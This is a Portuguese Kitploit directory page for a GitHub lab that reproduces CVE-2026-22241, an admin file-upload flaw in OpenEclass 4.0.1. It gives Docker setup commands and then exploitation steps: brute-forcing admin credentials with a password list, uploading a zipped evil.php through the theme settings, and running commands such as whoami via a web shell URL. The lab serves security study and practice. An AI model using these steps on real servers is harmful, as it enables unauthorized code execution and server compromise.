Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-22241 — Ambiente de Laboratório para CVE-2026-22241 | Kitploit
Ferramentas/GitHubGitHub/cves-labs/cve-2026-22241
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubcves-labs/cve-2026-22241

CVE-2026-22241

Ambiente de Laboratório para CVE-2026-22241

Ver Repositório
47há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-22241

Ambiente de Laboratório para CVE-2026-22241

Descrição da Vulnerabilidade:

  • Vulnerabilidade: Upload Irrestrito de Arquivo com Tipo Perigoso.
  • Impacto: Execução Remota de Código (RCE).
  • Descrição: Esta falha permite que um atacante com privilégios administrativos faça upload de um arquivo PHP malicioso (Web Shell), levando ao comprometimento total da integridade e segurança do servidor web.
  • Sistema Alvo: Infraestrutura Educacional OpenClass.

1. Construir o ambiente

sudo git clone https://github.com/CVEs-Labs/CVE-2026-22241.git

abra https://www.openeclass.org/en/previous-versions/ e baixe openeclass-4.0.1.zip

sudo apt update && sudo apt install docker.io docker-compose -y

sudo systemctl start docker

sudo cp openeclass-4.0.1.zip CVE-2026-22241

cd CVE-2026-22241

sudo mkdir html

sudo unzip openeclass-4.0.1.zip -d ./temp_folder

sudo mv ./temp_folder/openeclass-4.0.1/* ./html/

sudo rm -rf ./temp_folder

sudo rm -rf openeclass-4.0.1.zip

sudo chown -R $USER:www-data html/

sudo chmod -R 775 html/

sudo docker-compose up -d

sudo docker exec -it eclass-web bash -c "apt-get update && apt-get install -y libpng-dev libzip-dev libicu-dev libxml2-dev libldap2-dev && docker-php-ext-configure ldap --with-libdir=lib/x86_64-linux-gnu/ && docker-php-ext-install zip gd pdo pdo_mysql intl soap ldap && apache2ctl restart"

sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' eclass-web

http://ip-docker

imagem
Baixar ferramenta

2. Explorar a vulnerabilidade:

para lista de chaves no ZAP (Força Bruta): https://gitlab.com/kalilinux/packages/seclists/-/blob/kali/master/Passwords/Common-Credentials/Pwdb_top-1000.txt

zip poc.zip evil.php

na página do eclass: vá para ferramentas de administrador -> configurações de tema -> então faça upload de poc.zip

em nova página:

http://ip-docker/courses/theme_data/evil.php?cmd=whoami

http://ip-docker/courses/theme_data/evil.php?cmd=id